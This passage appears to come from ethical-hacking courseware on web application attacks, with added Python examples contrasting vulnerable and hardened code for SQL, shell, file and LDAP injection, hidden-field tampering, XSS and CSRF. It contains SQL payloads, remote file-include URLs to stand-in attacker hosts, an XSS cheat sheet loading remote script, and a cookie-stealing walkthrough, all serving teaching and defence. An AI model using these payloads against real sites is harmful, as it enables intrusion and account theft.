The expression "OR 1=1" evaluates to TRUE for every row, often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:
- Log in to the application without supplying valid credentials
- Perform queries against data in the database, often even data to which the application would not normally have access
- Modify the database contents, or drop the database altogether
- Use the trust relationships established between the web application components to access other databases
The figure also shows a second payload, test'), ('user2', 'I am Jason'), ('user3', which closes the first VALUES tuple of the INSERT and appends attacker-chosen rows within the same statement.
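The save_email() pattern and the OR 1=1 lookup above, as an added example that is not the slide's PHP: rebuilt in Python on an in-memory SQLite database, once by string concatenation and once with bound parameters, including the row-injection payload from the figure and a check of what happens to the stacked DROP on a single-statement API. Tables, rows and payloads are constructed here for the demonstration.

```python
# Added example, not the CEH slide's PHP: save_email() rebuilt in Python on an
# in-memory SQLite database, once by string concatenation (the slide's pattern)
# and once with a parameterized statement. Tables, rows and payloads are
# constructed here for the demonstration.
import sqlite3


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Messages (user TEXT, message TEXT)")
    db.execute("CREATE TABLE Users (UserID INTEGER, name TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)", [(2302, "jason"), (1036, "mark")])
    return db


def messages(db):
    return db.execute("SELECT user, message FROM Messages ORDER BY rowid").fetchall()


def save_email_vulnerable(db, user, message):
    # The slide's shape: values are spliced into the SQL text, so a quote in
    # `user` ends the string literal and the rest of the input becomes SQL.
    sql = f"INSERT INTO Messages ( user, message ) VALUES ( '{user}', '{message}' )"
    db.execute(sql)
    return messages(db)


def save_email_safe(db, user, message):
    # Placeholders keep the data out of the SQL grammar entirely.
    db.execute("INSERT INTO Messages ( user, message ) VALUES ( ?, ? )", (user, message))
    return messages(db)


def lookup_user_vulnerable(db, user_id):
    """SELECT ... WHERE UserID= <input>, with the input concatenated as text."""
    return db.execute(
        f"SELECT name FROM Users WHERE UserID= {user_id} ORDER BY rowid").fetchall()


def lookup_user_safe(db, user_id):
    """Type-check the id, then bind it; '2302 OR 1=1' cannot pass int()."""
    return db.execute(
        "SELECT name FROM Users WHERE UserID= ? ORDER BY rowid", (int(user_id),)).fetchall()


def stacked_drop_rejected(db):
    """The slide's test');DROP TABLE Messages;-- relies on stacked queries.
    Single-statement APIs (SQLite's execute(), PHP's mysql_query()) refuse
    them, which is why the row-injection payload matters more in practice."""
    try:
        save_email_vulnerable(db, "test');DROP TABLE Messages;--", "x")
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False


# Constructed payload from the figure: closes the first tuple, adds two rows.
ROW_INJECTION = "test', 'x'), ('user2', 'I am Jason'), ('user3"

if __name__ == "__main__":
    db = fresh_db()
    print(save_email_vulnerable(db, ROW_INJECTION, "y"))   # three rows inserted
    print(save_email_safe(fresh_db(), ROW_INJECTION, "y"))  # one row, payload stored as text
    print(lookup_user_vulnerable(fresh_db(), "2302 OR 1=1"))  # every user
    print(stacked_drop_rejected(fresh_db()))
```

The safe variants do not filter or escape anything; they change how the value reaches the engine, which is the only fix that does not depend on predicting every encoding an attacker might use.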
Shell Injection

Command injection is a serious threat to web application security: these injections allow intruders to perform various types of malicious attacks against the server on which the application runs. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs: any call that hands a string to a command interpreter, or launches a process with attacker-influenced arguments, is a candidate.
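The system()-style call above, as an added example that is not part of the CEH text: a host lookup that passes user input through /bin/sh, beside the same lookup run as an argument vector with an allowlist on the value. `echo` stands in for whatever command the real page would run (an assumption made so the example runs offline), and the injected string is constructed here.

```python
# Added example, not from the CEH text: a system()-style lookup that hands user
# input to /bin/sh, beside an argument-vector version with an allowlist. `echo`
# stands in for whatever command the real page would run (an assumption made so
# the example runs offline); the injected strings are constructed here.
import re
import subprocess

# Hostname shape per the usual DNS label rules: letters, digits, hyphens, dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)


def lookup_vulnerable(host):
    """system()-equivalent: the whole string is parsed by the shell, so ';'
    in `host` starts a second command of the attacker's choosing."""
    result = subprocess.run(f"echo resolving {host}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def lookup_no_shell(host):
    """Argument vector, no shell: metacharacters are just bytes in one argument.
    This alone does not stop argument injection (a value starting with '-'),
    which is why the allowlist below is still needed."""
    result = subprocess.run(["echo", "resolving", host],
                            capture_output=True, text=True)
    return result.stdout


def lookup_hardened(host):
    """Allowlist the value *and* avoid the shell; reject everything else."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return lookup_no_shell(host)


if __name__ == "__main__":
    payload = "juggyboy.com; echo INJECTED"        # constructed attacker input
    print(lookup_vulnerable(payload), end="")      # second line: INJECTED
    print(lookup_no_shell(payload), end="")        # one line, payload literal
    try:
        lookup_hardened(payload)
    except ValueError as e:
        print(e)
```

Dropping the shell is what removes the metacharacter problem; the allowlist is what stops the remaining tricks (option injection, oversized values) that do not need a shell at all.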
HTML Embedding

This type of attack is used to deface websites. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML markup or scripting.
File Injection
The attacker exploits this vulnerability to make the server include and execute a file of the attacker's choosing, here one hosted on a remote server:

http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?

Users are also allowed to upload various files to the server through various applications, and those files can be accessed over the Internet from anywhere in the world. If an uploaded file has a .php extension and any user requests it, the server interprets it as a PHP script and executes it. Either way, the attacker's code runs on the server, which allows the attacker to execute arbitrary commands.
Example: exploiting poor input validation

Figure: a banner-management CGI on JuggyBoy.com (http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036, as shown in the figure) has a form with User Name, Email Address and Password fields and a field for the URL of a banner image. The attacker submits the following malicious value in that field:

www.juggyboy.com/banner.gif||newpassword||1036|60|468

The server script assumes that only the URL of the banner image file is inserted into that field, but the value is split into multiple columns of the database INSERT and UPDATE record command. Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword". Poor input validation in the server script was exploited in this attack.
File Injection Attack

File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.

Figure: file injection attack. The attacker's request supplies the DRINK parameter; the server script reads $_GET['DRINK'] and passes it, with '.php' appended, to require().
Users are allowed to upload various files to the server through various applications, and those files can be accessed over the Internet from anywhere in the world. If an uploaded file has a .php extension and any user requests it, the server interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. Consider the following client code running in a browser:

<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
</form>
Server code:

<?php
if (isset($_GET['DRINK'])) {
    $drink = $_GET['DRINK'];
    require($drink . '.php');
}
?>

Using this PHP code, the attacker injects a remotely hosted file at:

Exploit code: http://www.juggyboy.com/orders.php?DRINK=http://jasonevil.com/exploit?
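The DRINK include above, as an added example that is not part of the CEH text, also serving the input validation and directory traversal passages earlier on this page: a resolver that canonicalizes the parameter (repeated percent-decoding, so double-encoded ../ is seen for what it is), refuses URLs and NUL bytes, and confines the result to the include directory with realpath before the file is touched. The include directory, its two theme files and the payloads are constructed here; the remote URL and traversal strings are those from the text.

```python
# Added example, not from the CEH text: a resolver for the DRINK/COLOR style
# include parameter that canonicalizes the value before checking it (the input
# validation and directory traversal passages) and refuses remote and
# out-of-tree files (the file injection passage). The include directory, its
# files and the payloads are constructed here.
import os
import re
import tempfile
from urllib.parse import unquote

SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")   # http:, ftp:, php:, data:, ...


class BadInclude(ValueError):
    """Raised for any value that does not name a local file inside the include dir."""


def canonicalize(value, max_rounds=3):
    """Percent-decode until the value is stable, so '..%252f' and '%2e%2e/' are
    seen as '../' by the checks below; give up on absurd nesting."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise BadInclude("too many layers of encoding")


def resolve_include(base_dir, name, ext=".php"):
    """Return the real path of <base_dir>/<name><ext>, or raise BadInclude."""
    name = canonicalize(name)
    if "\x00" in name:
        raise BadInclude("NUL byte would truncate the path in C-based runtimes")
    if SCHEME_RE.match(name) or name.startswith("//"):
        raise BadInclude("remote include refused")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + ext))
    if os.path.commonpath([base, target]) != base:
        raise BadInclude("path escapes the include directory")
    if not os.path.isfile(target):
        raise BadInclude("no such include")
    return target


def naive_filter_blocks(name):
    """A substring check applied before decoding: what it misses is the point."""
    return ".." in name


def demo_dir():
    """Constructed include directory holding the two legitimate theme files."""
    d = tempfile.mkdtemp(prefix="includes_")
    for theme in ("pepsi", "coke"):
        with open(os.path.join(d, theme + ".php"), "w") as f:
            f.write(f"<?php // {theme} theme ?>\n")
    return d


if __name__ == "__main__":
    d = demo_dir()
    print(resolve_include(d, "pepsi"))
    for bad in ("http://jasonevil.com/exploit?", "../../../../etc/passwd",
                "%2e%2e%2f%2e%2e%2fetc%2fpasswd", "..%252f..%252fetc%252fpasswd",
                "pepsi%00"):
        try:
            resolve_include(d, bad)
        except BadInclude as e:
            print(f"{bad!r}: {e}  (naive filter would block: {naive_filter_blocks(bad)})")
```

Where the set of legitimate includes is small and fixed, as with pepsi/coke here, a plain dictionary lookup from option value to file is simpler still and should be preferred; the canonicalize-then-confine approach is for the cases where the name space really is open-ended.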
What Is LDAP Injection?

An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access to databases behind an LDAP tree.

LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model and clients can search the directory entries using filters.

Filter syntax: (attributeName operator value)

Operator   Example
=          (objectclass=user)
>=         (mdbStorageQuota>=100000)
<=         (mdbStorageQuota<=100000)
~=         (displayName~=Foeckeler)
*          (displayName=*John*)
AND (&)    (&(objectclass=user)(displayName=John))
OR (|)     (|(objectclass=user)(displayName=John))
NOT (!)    (!(objectClass=group))
What is LDAP Injection?

An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All inputs to the LDAP query must be properly filtered; otherwise the vulnerability allows executing unauthorized queries or modifying directory contents. LDAP injection attacks exploit web applications that construct LDAP statements from user input: when the application fails to sanitize that input, the attacker modifies the statement, for example by editing the request in a local proxy. Directory services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients can search the directory entries using filters.
How LDAP Injection Works

LDAP injection attacks are commonly used against web applications; any application whose user input is used to generate LDAP queries is a candidate. To test whether an application is vulnerable to LDAP injection, send input that produces an invalid filter. If the LDAP server returns an error, the application can be exploited with code injection techniques. Depending on the implementation of the target, one can try to achieve:
- Login bypass
- Information disclosure
- Privilege escalation
- Information alteration
FIGURE 13.11: Normal operation. The client sends a normal query to the LDAP server and receives the normal result.

FIGURE 13.12: Operation with code injection. The client sends a query modified with injected code; the LDAP server returns the normal result and/or additional information.
Attack

If an attacker enters the valid user name "juggyboy" and injects juggyboy)(&)) in the user name field, with blah as the password, the filter string becomes (&(USER=juggyboy)(&))(PASS=blah)). An LDAP server that ignores everything after the first complete filter processes only (&(USER=juggyboy)(&)); since (&) is always true, the whole query is true whenever the user exists, and the attacker logs into the system without a valid password. A server that insists on well-formed filters rejects the string with an error instead, which is exactly the response the vulnerability test above relies on.
Hidden Field Manipulation Attack

When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, which are not rendered to the screen by the browser, but are collected and submitted as parameters during form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change the POST request sent to the server.

Figure: normal request. The order form for "Juggyboy Shirt" (price 200.00) carries the price in a hidden field:

<form method="post" action="page.aspx">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00 <input type="hidden" name="PRICE" value="200.00"><br>
<input type="submit" value="submit">
</form>
Hidden field manipulation attacks are mostly used against e-commerce websites, and many online stores face this problem. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). At development time, developers assume the applications they build are safe, but an attacker can manipulate the price of the product and complete a transaction at the altered price rather than the actual one. For example: a particular mobile phone is for sale for $1000, and the attacker, by altering the price, buys it for only $10. This is a direct loss for the website owner. To protect their networks, website owners deploy the latest antivirus software, firewalls, intrusion detection systems, and so on, but none of these controls inspects the application's business logic; only server-side validation of every parameter, and recomputing prices from the server's own catalog, prevents this attack. A website that is attacked in this way also loses credibility in the market.

When a user makes choices on an HTML page, the choices are saved as form field values and delivered to the application as an HTTP request (GET or POST). HTML pages generally save field values as hidden fields; they are not displayed on the user's screen but are placed in the request as parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change the POST request sent to the server.

<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>

1. Open the HTML page in an HTML editor.
2. Locate the hidden field (e.g., <input type="hidden" name="price" value="200.00">).
3. Modify its content to a different value (e.g., <input type="hidden" name="price" value="2.00">).
4. Save the HTML file locally and browse to it.
5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.
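The page.aspx checkout above, as an added example that is not part of the CEH text: the server charging whatever the hidden PRICE field says, beside a version that looks the price up by product name on the server, and an HMAC for the rarer case where some hidden state genuinely has to round-trip through the browser. The catalog, the secret key and the requests are constructed for the demonstration.

```python
# Added example, not from the CEH text: the page.aspx checkout with the hidden
# PRICE field, trusted as on the slide and then replaced by a server-side price
# lookup; plus an HMAC for hidden state that really has to round-trip through
# the browser. Catalog, key and requests are constructed for the demonstration.
import hashlib
import hmac
from decimal import Decimal

CATALOG = {"Juggyboy Shirt": Decimal("200.00")}      # server-side source of truth
SECRET_KEY = b"constructed-example-key-rotate-me"     # assumption: kept server-side only


def checkout_vulnerable(form):
    """Charges whatever the browser sent in PRICE, e.g. 2.00 after editing the HTML."""
    return Decimal(form["PRICE"]) * int(form.get("qty", "1"))


def checkout_hardened(form):
    """Ignores PRICE entirely: the price is looked up by product on the server."""
    price = CATALOG[form["product"]]        # KeyError for a product we do not sell
    qty = int(form.get("qty", "1"))
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return price * qty


def sign_hidden(name, value):
    """For state that must travel through the client: value|HMAC(name=value).
    Binding the field name stops a tag for one field being replayed on another."""
    tag = hmac.new(SECRET_KEY, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return f"{value}|{tag}"


def verify_hidden(name, field):
    """Return the value if its tag is intact, else raise ValueError."""
    value, sep, tag = field.rpartition("|")
    expected = hmac.new(SECRET_KEY, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    if not sep or not hmac.compare_digest(tag, expected):
        raise ValueError(f"hidden field {name!r} was tampered with")
    return value


if __name__ == "__main__":
    tampered = {"product": "Juggyboy Shirt", "PRICE": "2.00"}   # constructed request
    print(checkout_vulnerable(tampered))    # 2.00
    print(checkout_hardened(tampered))      # 200.00
    signed = sign_hidden("PRICE", "200.00")
    print(verify_hidden("PRICE", signed))
    try:
        verify_hidden("PRICE", "2.00|" + signed.split("|")[1])
    except ValueError as e:
        print(e)
```

Prefer the catalog lookup whenever the value can be recomputed; the signed field is for things like a multi-step wizard's intermediate state, and even then the server should keep the authoritative copy in its session store when it can.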
Figure: attack request. The hidden field PRICE = 200.00 is edited and the request becomes:

http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00
Cross-Site Scripting (XSS) Attacks

Cross-site scripting ('XSS' or 'CSS') attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.

Consequences: session hijacking, exploiting user privileges, data theft, intranet probing, data manipulation.
Cross-site scripting is also called XSS. The vulnerability arises when an attacker can use a web application to deliver malicious code, typically JavaScript, to other end users. It occurs when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application echoes input from one user, an attacker can plant an attack in that input, and it propagates to every user who views the resulting page. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user trusts the web application, and the attacker exploits that trust in order to do things that would not be allowed under normal conditions. An attacker often encodes the malicious portion of the tag in different ways (for example in Unicode or hex escapes) so that the request looks genuine to the user. The consequences include:
- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden IFRAMEs and pop-ups
- Data manipulation
- Keylogging and remote monitoring
How XSS Attacks Work

This hypothetical example uses a vulnerable page which handles requests for nonexistent pages, a classic 404 error page. The server code URL-decodes the requested URI and writes it into the response page.

Normal request: http://juggyboy.com/jason_file.html

Server code (fragment as shown on the slide):
<?php
... urldecode($_SERVER["REQUEST_URI"]); ...
?>

Server response: the 404 page, containing the decoded request URI. Because the URI is attacker-controlled and is not encoded for HTML on output, a URI that contains script markup is reflected to the browser and executed.
Cross-Site Scripting Attack Scenario: Attack via Email

Figure: the attacker sends an email with a malicious link (HREF=http://juggyboy.com/...); the user clicks the malicious link, and the malicious code is executed in the client web browser.
In a cross-site scripting attack via email, the attacker crafts an email that contains a link carrying a malicious script and sends it to the victim.

Malicious link:
<A HREF=http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>

When the user clicks the link, the URL is sent to legitimateSite.com with the malicious code in the clientprofile parameter. The server sends a page back to the user that includes the value of clientprofile, and the malicious code is executed on the client's machine in the security context of legitimateSite.com. The following diagram depicts this attack scenario:
XSS Example: Attack via Email

Figure: the participants are the user's browser, the malicious script, the attacker's server and the legitimate server. The attacker constructs a malicious link (<A HREF=http://juggyboybank.com/...), emails the URL to the user and convinces the user to click it; the browser requests the page, the legitimate server returns the page with the malicious script, and the script runs in the user's browser.
The following are the steps involved in an XSS attack via email:
1. Construct a malicious link:
<A HREF=http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>
2. Email the URL to the user and convince the user to click on it.
3. The user's browser requests the page.
4. The legitimate server sends a response page that includes the malicious script.
5. The malicious script runs in the user's browser.
XSS Example: Stealing Users' Cookies
To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then installs a cookie stealer (cookie logger). The following are the steps involved in stealing a user's cookies with the help of an XSS attack:
1. The attacker hosts a page with a malicious script.
2. The user visits the page hosted by the attacker.
3. The attacker's server sends the response as HTML containing the malicious script.
4. The user's browser runs the malicious script.
5. The cookie logger in the malicious script collects the user's cookies.
6. The malicious script redirects the user to the attacker's server.
7. The user's browser sends the request with the user's cookies.
FIGURE 13.18: Stealing Users' Cookies (diagram: the user's browser requests the page with the malicious script from the attacker's server, runs the script, which collects the user's cookies, and is redirected to the attacker's server with the cookies attached)
XSS Example: Sending an Unauthorized Request
Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request:
1. The attacker constructs a malicious link.
2. The attacker sends an email containing the URL to the user and convinces the user to click on it.
3. The user's browser sends a request to the attacker's server for the page.
4. The attacker's server, in response to the user's request, sends the page with the malicious script.
5. The user's browser runs the malicious script.
6. The malicious script sends an authorized request.
Diagram: XSS attack in a comment field. The attacker adds a malicious script in the comment field of a blog post ("Jason, I love your blog post! -Mark" followed by the malicious code <script>alert("Hello World")</script>; the slide also shows the variant <script>onload=window.location...). The comment with the malicious script is stored on the database server; when the web application serves the comment back to a visitor, the script runs and a pop-up window "Hello World" appears in the browser.
XSS Attack in a Comment Field
Many web applications use HTML pages that dynamically accept data from different sources. The data in the HTML pages can be changed dynamically according to the request. Attackers use the HTML page's tags to manipulate the data and launch the attack by placing a malicious script in the comments feature. When the target views the comment and the page renders it, the malicious script is executed in the target's browser, performing malicious actions.
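Added example (not part of the courseware): the stored-XSS comment from the slide rendered by a vulnerable template and by a hardened one that HTML-encodes untrusted data at output time, plus the HttpOnly cookie attribute that blunts the cookie-stealing scenario above. The template, the author name and the session ID value are constructed for the example.

```python
import html
import re
from typing import Optional

# Constructed sample input: the blog comment shown on the slide, as the attacker submits it.
MALICIOUS_COMMENT = 'Jason, I love your blog post! <script>alert("Hello World")</script>'

# Hypothetical page template; {body} and {author} are filled from stored comment data.
COMMENT_TEMPLATE = '<div class="comment"><p>{body}</p><p class="author">{author}</p></div>'


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable rendering: the stored comment is pasted into the page verbatim,
    so the <script> inside it runs in every reader's browser (stored XSS)."""
    return COMMENT_TEMPLATE.format(body=body, author=author)


def render_comment_safe(author: str, body: str) -> str:
    """Hardened rendering: every untrusted value is HTML-entity encoded at output
    time, so '<script>' becomes '&lt;script&gt;' and is displayed, not executed."""
    return COMMENT_TEMPLATE.format(
        body=html.escape(body, quote=True),
        author=html.escape(author, quote=True),
    )


# Script-capable markup, URL schemes and event handlers that must never reach the
# page unencoded from user-supplied data (covers the IMG/META/BODY vectors of the cheat sheet).
_ACTIVE_CONTENT = re.compile(
    r"<\s*(script|img|iframe|body|style|link|meta|layer|bgsound)\b|javascript:|\bon\w+\s*=",
    re.IGNORECASE,
)


def contains_active_content(fragment: str) -> bool:
    """Detection helper for stored comments or rendered output: True when
    script-capable markup or a script URL scheme is present unencoded."""
    return _ACTIVE_CONTENT.search(fragment) is not None


def session_cookie_header(session_id: str, domain: Optional[str] = None) -> str:
    """Mitigation for the cookie-stealing scenario: HttpOnly stops injected script
    from reading the session ID through document.cookie; Secure restricts it to TLS."""
    attrs = [f"SESSIONID={session_id}", "Path=/", "HttpOnly", "Secure", "SameSite=Lax"]
    if domain:
        attrs.insert(2, f"Domain={domain}")
    return "Set-Cookie: " + "; ".join(attrs)


if __name__ == "__main__":
    print(render_comment_unsafe("Mark", MALICIOUS_COMMENT))   # script tag survives
    print(render_comment_safe("Mark", MALICIOUS_COMMENT))     # script tag is entity-encoded
    print(session_cookie_header("325896ASDD23SA3587"))
```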
XSS Cheat Sheet
- XSS locator: '';!--"<XSS>=&{()}
- Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- Image XSS: <IMG SRC="javascript:alert('XSS');">
- No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>
- Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>
- HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>
- Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- Embedded tab (a literal tab character inside "javascript"): <IMG SRC="jav	ascript:alert('XSS');">
- Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">
- Embedded newline: <IMG SRC="jav&#x0A;ascript:alert('XSS');">
- Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">
- Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
- Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">
- IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">
- BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
- LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
- STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- Local htc file: <XSS STYLE="behavior: url(xss.htc);">
- VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>
- Mocha: <IMG SRC="livescript:[code]">
- US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾
- META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
- TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
- Non-alpha-non-digit part 2 XSS: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
- No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>
- Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"
- Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <
- XSS with no single quotes or double quotes or semicolons: <SCRIPT>alert(/XSS/.source)</SCRIPT>
- Escaping JavaScript escapes: \";alert('XSS');//
- End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
FIGURE 13.22: XSS Cheat Sheet
Cross-Site Request Forgery (CSRF) Attack
- Cross-Site Request Forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend.
- The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
Cross-Site Request Forgery (CSRF) Attack
Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed, through a malicious web page, to send a request to the vulnerable website. CSRF vulnerabilities are very commonly found on financial websites. Corporate intranets usually cannot be reached directly by outside attackers, so CSRF is one way for an attacker to get requests into the network. A web application's inability to differentiate a request generated by malicious code from a genuine request exposes it to CSRF attacks. Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.
Diagram: the user logs into the trusted website and creates a new session; the session identifier is stored in a cookie in the web browser. The user then visits a malicious website, which sends a request to the trusted website from the user's browser using the user's session cookie.
How CSRF Attacks Work
In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user into clicking on a malicious link containing arbitrary code. When the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The following diagram explains the step-by-step process of a CSRF attack:
Diagram: the trusted server sets a session cookie in the user's browser; the attacker sends a phishing mail tricking the user into sending a request to a malicious site; the user requests a page from the malicious server; the response page contains malicious code; the malicious code is executed in the trusted server.

Server code on the trusted server (reconstructed from the fragments on the slide; the opening <form> tag is not shown there and is supplied for completeness):

    <?php
    if (isset($_REQUEST['symbol']) && isset($_REQUEST['shares'])) {
        // $_REQUEST accepts GET and POST parameters alike, so a crafted link
        // or a form on the attacker's page can trigger the purchase.
        buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']);
    }
    ?>
    <form method="post">
        <p>Symbol: <input type="text" name="symbol" /></p>
        <p>Shares: <input type="text" name="shares" /></p>
        <p><input type="submit" value="Buy" /></p>
    </form>
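Added example (not the courseware's code, and a Python stand-in for the slide's PHP): the buy handler as the slide shows it, which honours any request carrying symbol and shares, beside a hardened handler that requires POST and a session-bound CSRF token. The secret key, the session ID and the parameter values are constructed; buy_stocks() is a stub.

```python
import hashlib
import hmac
from typing import Tuple
from urllib.parse import parse_qs

# Assumption: a per-deployment secret held only by the trusted server (constructed value).
SECRET_KEY = b"constructed-server-secret-change-me"


def parse_params(data: str) -> dict:
    """Flatten form-encoded body or query-string data to single values."""
    return {k: v[0] for k, v in parse_qs(data, keep_blank_values=True).items()}


def buy_stocks(symbol: str, shares: int) -> str:
    """Stub for the slide's buy_stocks(); only reports what would be bought."""
    return f"bought {shares} of {symbol}"


def handle_buy_vulnerable(method: str, session_id: str, data: str) -> Tuple[int, str]:
    """Mirrors the slide's PHP: like $_REQUEST, it accepts GET or POST, and nothing
    proves the request came from a form the user intentionally submitted. A link in
    a phishing mail, loaded while the session cookie is valid, is enough."""
    params = parse_params(data)
    if "symbol" in params and "shares" in params:
        return 200, buy_stocks(params["symbol"], int(params["shares"]))
    return 200, "form"


def csrf_token(session_id: str) -> str:
    """Token bound to the session by an HMAC over the session ID. The attacker's
    site cannot read the victim's cookie (same-origin policy), so it cannot derive
    the token. A random per-session token stored server-side works equally well."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_buy_hardened(method: str, session_id: str, data: str) -> Tuple[int, str]:
    """A state-changing action requires POST plus a token that matches the session;
    parameters are validated before the business function runs."""
    if method != "POST":
        return 405, "buy requires POST"
    params = parse_params(data)
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(session_id)):
        return 403, "missing or invalid CSRF token"
    symbol = params.get("symbol", "")
    shares = params.get("shares", "")
    if not symbol.isalpha() or not shares.isdigit():
        return 400, "bad parameters"
    return 200, buy_stocks(symbol, int(shares))


if __name__ == "__main__":
    sid = "325896ASDD23SA3587"                     # constructed session cookie value
    forged = "symbol=ACME&shares=1000"             # what the attacker's page submits
    print(handle_buy_vulnerable("GET", sid, forged))   # (200, 'bought 1000 of ACME')
    print(handle_buy_hardened("POST", sid, forged))    # (403, 'missing or invalid CSRF token')
```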
Why Are Applications Vulnerable?
Web Services Unavailability
Targets: CPU, memory, and sockets; disk bandwidth; database bandwidth; worker processes
Web Application Denial of Service (DoS) Attack
